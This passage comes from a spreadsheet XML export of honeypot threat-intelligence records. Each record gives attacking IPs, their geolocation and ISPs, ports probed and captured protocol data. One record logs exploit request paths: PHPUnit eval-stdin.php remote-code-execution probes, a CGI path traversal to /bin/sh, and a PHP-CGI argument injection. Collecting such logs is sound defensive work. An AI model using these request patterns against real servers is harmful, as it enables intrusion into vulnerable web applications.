    <s v="Superonline Iletisim Hizmetleri A.S."/>
    <s v="business"/>
    <s v="Global Iletisim Hizmetleri"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5433:35fb"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1234"/>
    <x v="1234"/>
    <s v="wincloud228667.mywhc.ca&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-18T21:29:45"/>
    <d v="2024-12-10T14:42:27"/>
    <d v="2025-04-18T21:29:45"/>
    <n v="5220"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_MSSQL_H8"/>
    <s v="1433&amp;&amp;16808&amp;&amp;16012&amp;&amp;18118&amp;&amp;17913&amp;&amp;17001&amp;&amp;18389&amp;&amp;49184&amp;&amp;6370&amp;&amp;5592&amp;&amp;7494&amp;&amp;18321&amp;&amp;19078&amp;&amp;17301&amp;&amp;19375&amp;&amp;35029&amp;&amp;37366&amp;&amp;37005&amp;&amp;36121&amp;&amp;17630&amp;&amp;21399&amp;&amp;28934&amp;&amp;34821&amp;&amp;36164&amp;&amp;39320&amp;&amp;36144&amp;&amp;37953&amp;&amp;41158&amp;&amp;45593&amp;&amp;48410&amp;&amp;7181&amp;&amp;9001&amp;&amp;25016&amp;&amp;10576&amp;&amp;7983&amp;&amp;49054&amp;&amp;9897&amp;&amp;7669&amp;&amp;17478&amp;&amp;34416&amp;&amp;42624&amp;&amp;6691&amp;&amp;8626&amp;&amp;10734&amp;&amp;11823&amp;&amp;15827&amp;&amp;24561&amp;&amp;29571&amp;&amp;28614&amp;&amp;26794&amp;&amp;33012&amp;&amp;17327&amp;&amp;11194&amp;&amp;13033&amp;&amp;14614&amp;&amp;13998&amp;&amp;17929&amp;&amp;15918&amp;&amp;24849&amp;&amp;25783&amp;&amp;21300&amp;&amp;26418&amp;&amp;9362&amp;&amp;16069&amp;&amp;28108&amp;&amp;30660&amp;&amp;28555&amp;&amp;31774&amp;&amp;32430&amp;&amp;31444&amp;&amp;36299&amp;&amp;31195&amp;&amp;5594&amp;&amp;12240&amp;&amp;21759&amp;&amp;23192&amp;&amp;25388&amp;&amp;5816&amp;&amp;7257&amp;&amp;10707&amp;&amp;10146&amp;&amp;9070&amp;&amp;12202&amp;&amp;10751&amp;&amp;14944&amp;&amp;21443&amp;&amp;22893&amp;&amp;26362&amp;&amp;44871&amp;&amp;28529&amp;&amp;28991&amp;&amp;33642&amp;&amp;31664&amp;&amp;34599&amp;&amp;14184&amp;&amp;43610&amp;&amp;45270&amp;&amp;35812&amp;&amp;46373&amp;&amp;39169&amp;&amp;41945&amp;&amp;41045&amp;&amp;44904&amp;&amp;43976&amp;&amp;48134&amp;&amp;44675&amp;&amp;48754&amp;&amp;49471&amp;&amp;17434&amp;&amp;5650&amp;&amp;8541&amp;&amp;7677&amp;&amp;10489&amp;&amp;11689&amp;&amp;6554&amp;&amp;14196&amp;&amp;16590&amp;&amp;18290&amp;&amp;26821&amp;&amp;27340&amp;&amp;31066&amp;&amp;34332&amp;&amp;35140&amp;&amp;37772&amp;&amp;39223&amp;&amp;42389&amp;&amp;44234&amp;&amp;43601&amp;&amp;46152&amp;&amp;44536&amp;&amp;44713&amp;&amp;48572&amp;&amp;5555&amp;&amp;44181&amp;&amp;19755&amp;&amp;13021&amp;&amp;12484&amp;&amp;14540&amp;&amp;13495&amp;&amp;14662&amp;&amp;18005&amp;&amp;18471&amp;&amp;49591&amp;&amp;34349&amp;&amp;33237&amp;&amp;35900&amp;&amp;38773&amp;&amp;36916&amp;&amp;41105&amp;&amp;39772&amp;&amp;42138&amp;&amp;42693&amp;&amp;46346&amp;&amp;45662&amp;&amp;31059&amp;&amp;43449&amp;&amp;23398&amp;&amp;25562&amp;&amp;26278&amp;&amp;27355&amp;&amp;28286&amp;&amp;29272&amp;&amp;37891&amp;&amp;30069&amp;&amp;31909&amp;&amp;42745&amp;&amp;33812&amp;&amp;24301&amp;&amp;15821&amp;&amp;17841&amp;&amp;18359&amp;&amp;19052&amp;&amp;23930&amp;&amp;22221&amp;&amp;26623&amp;&amp;25540&amp;&amp;30554&amp;&amp;34846&amp;&amp;25084&amp;&amp;32058&amp;&amp;16699&amp;&amp;26066&amp;&amp;25222&amp;&amp;30745&amp;&amp;23982&amp;&amp;29528&amp;&amp;30159&amp;&amp;29782&amp;&amp;30595&amp;&amp;30027&amp;&amp;16123&amp;&amp;21465&amp;&amp;13393&amp;&amp;32734&amp;&amp;37690&amp;&amp;17230&amp;&amp;31095&amp;&amp;19195&amp;&amp;20748&amp;&amp;47024&amp;&amp;49741&amp;&amp;48073&amp;&amp;48907&amp;&amp;21240&amp;&amp;9327&amp;&amp;7365&amp;&amp;7962&amp;&amp;10284&amp;&amp;12825&amp;&amp;13245&amp;&amp;25513&amp;&amp;36946&amp;&amp;34861&amp;&amp;37752&amp;&amp;40664&amp;&amp;39123&amp;&amp;43603&amp;&amp;42835&amp;&amp;45747&amp;&amp;44038&amp;&amp;46525&amp;&amp;48360&amp;&amp;49334&amp;&amp;49892&amp;&amp;6200&amp;&amp;28011&amp;&amp;23976&amp;&amp;21614&amp;&amp;21572&amp;&amp;28382&amp;&amp;40603&amp;&amp;37522&amp;&amp;48047&amp;&amp;47306&amp;&amp;47916&amp;&amp;47868&amp;&amp;29226&amp;&amp;36796&amp;&amp;37120&amp;&amp;24600&amp;&amp;25922&amp;&amp;29502&amp;&amp;26646&amp;&amp;31634&amp;&amp;32241&amp;&amp;27752&amp;&amp;7493&amp;&amp;28696&amp;&amp;31881&amp;&amp;29642&amp;&amp;32394&amp;&amp;33880&amp;&amp;35366&amp;&amp;35846&amp;&amp;38879&amp;&amp;34577&amp;&amp;39785&amp;&amp;7639&amp;&amp;7239&amp;&amp;7961&amp;&amp;28480&amp;&amp;9820&amp;&amp;9116&amp;&amp;12644&amp;&amp;10905&amp;&amp;14784&amp;&amp;9919&amp;&amp;11127&amp;&amp;11368&amp;&amp;11663&amp;&amp;14071&amp;&amp;13429&amp;&amp;13844&amp;&amp;29630&amp;&amp;17557&amp;&amp;14085&amp;&amp;15939&amp;&amp;20823&amp;&amp;19172&amp;&amp;23214&amp;&amp;26260&amp;&amp;49205&amp;&amp;7396&amp;&amp;6972&amp;&amp;8184&amp;&amp;7772&amp;&amp;34429&amp;&amp;47682&amp;&amp;15733&amp;&amp;14518&amp;&amp;20424&amp;&amp;17787&amp;&amp;21169&amp;&amp;25157&amp;&amp;18409&amp;&amp;24795&amp;&amp;18512&amp;&amp;18430&amp;&amp;22474&amp;&amp;26442&amp;&amp;23737&amp;&amp;39255&amp;&amp;43144&amp;&amp;17348&amp;&amp;23226&amp;&amp;26250&amp;&amp;36806&amp;&amp;40695&amp;&amp;41453&amp;&amp;40125&amp;&amp;8345&amp;&amp;25998&amp;&amp;25056&amp;&amp;30781&amp;&amp;27463&amp;&amp;26489&amp;&amp;26839&amp;&amp;35484&amp;&amp;42882&amp;&amp;19454&amp;&amp;16800&amp;&amp;18099&amp;&amp;20161&amp;&amp;19806&amp;&amp;45763&amp;&amp;10756&amp;&amp;27038&amp;&amp;35487&amp;&amp;28379&amp;&amp;32088&amp;&amp;11564&amp;&amp;44765&amp;&amp;45604&amp;&amp;18451&amp;&amp;6410&amp;&amp;30973&amp;&amp;43140&amp;&amp;34643&amp;&amp;34675&amp;&amp;37858&amp;&amp;35479&amp;&amp;10650&amp;&amp;11052&amp;&amp;12388&amp;&amp;30878&amp;&amp;6694&amp;&amp;33386&amp;&amp;33414&amp;&amp;40629&amp;&amp;44671&amp;&amp;45435&amp;&amp;10976"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="CA"/>
    <s v="Canada"/>
    <s v="QC"/>
    <s v="Quebec"/>
    <s v="Montérégie"/>
    <s v="Beauharnois"/>
    <s v="5896495"/>
    <s v="J6N"/>
    <s v="45.3147"/>
    <s v="-73.8785"/>
    <s v="16276"/>
    <s v="OVH SAS"/>
    <s v="OVH SAS"/>
    <s v="hosting"/>
    <s v="OVH Hosting, Inc"/>
    <s v="2021-09-14"/>
    <s v="HO-2"/>
    <s v="2021-09-14"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2015-09-17 14:59:58"/>
    <s v="2030-09-17 14:59:58"/>
    <s v="2024-11-05 21:39:29"/>
    <s v="['ns1.whc.ca', 'ns2.whc.ca', 'ns3.whc.ca']"/>
    <s v="WHC Online Solutions Inc."/>
    <s v="['clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited', 'clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited']"/>
    <s v="NA"/>
    <x v="25"/>
    <s v="+1.5145042113"/>
    <s v="NA"/>
    <s v="::ffff:9471:bfe4"/>
    <s v="C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <s v="The attacker is attempting to scan and probe various network services, likely in an attempt to identify potential entry points for exploitation. They are sending test requests to different ports and services, such as DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, RDP, REDIS, SIP, SMB, SMTP, SNMP, and PostgreSQL, to see which ones are active or vulnerable."/>
    <s v="**Port Scan Attack**"/>
  </r>
  <r>
    <x v="1235"/>
    <x v="1235"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T21:13:13"/>
    <d v="2024-12-08T07:41:03"/>
    <d v="2025-04-18T21:13:13"/>
    <n v="51"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H23"/>
    <s v="445&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KG"/>
    <s v="Kyrgyzstan"/>
    <s v="GB"/>
    <s v="Bishkek"/>
    <s v="NA"/>
    <s v="Bishkek"/>
    <s v="1528675"/>
    <s v="NA"/>
    <s v="42.8746"/>
    <s v="74.5698"/>
    <s v="41750"/>
    <s v="Mega-Line Ltd."/>
    <s v="Mega-Line Ltd."/>
    <s v="cellular"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (109.201.191.224,64265)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (109.201.191.224,51099)}&amp;&amp;{Data_SMB:Incoming connection (109.201.191.224,51506)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (109.201.191.224,63746)}&amp;&amp;{Data_SMB:Incoming connection (109.201.191.224,64241)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (109.201.191.224,53083)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (109.201.191.224,56389)}&amp;&amp;{Data_SMB:Incoming connection (109.201.191.224,56700)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (109.201.191.224,61957)}&amp;&amp;{Data_SMB:Incoming connection (109.201.191.224,62430)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6dc9:bfe0"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1236"/>
    <x v="1236"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T20:10:21"/>
    <d v="2023-12-05T15:26:00"/>
    <d v="2025-04-18T20:10:21"/>
    <n v="291"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H30"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;51753&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="business"/>
    <s v="NME Project"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d3:4ef3"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1237"/>
    <x v="1237"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T19:10:13"/>
    <d v="2025-02-16T12:29:02"/>
    <d v="2025-04-18T19:10:13"/>
    <n v="107"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="37688&amp;&amp;23&amp;&amp;80&amp;&amp;443&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="23"/>
    <s v="Tehrān"/>
    <s v="Shahrestān-e Tehrān"/>
    <s v="Tehrān (District 3)"/>
    <s v="6659608"/>
    <s v="NA"/>
    <s v="35.7779"/>
    <s v="51.3946"/>
    <s v="21341"/>
    <s v="Soroush Rasanheh Company Ltd"/>
    <s v="Soroush Rasanheh Company Ltd"/>
    <s v="business"/>
    <s v="Soroush Rasanheh Company Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection&amp;&amp;login&amp;&amp;GET&amp;&amp;POST"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/vendor/phpunit/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/vendor/phpunit/phpunit/LICENSE/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/phpunit/phpunit/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/phpunit/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/lib/phpunit/phpunit/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/lib/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/lib/phpunit/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '105', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'POST', 'uri': '/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '225', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'POST', 'uri': '/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/vendor/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/vendor/phpunit/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/vendor/phpunit/phpunit/LICENSE/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/phpunit/phpunit/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 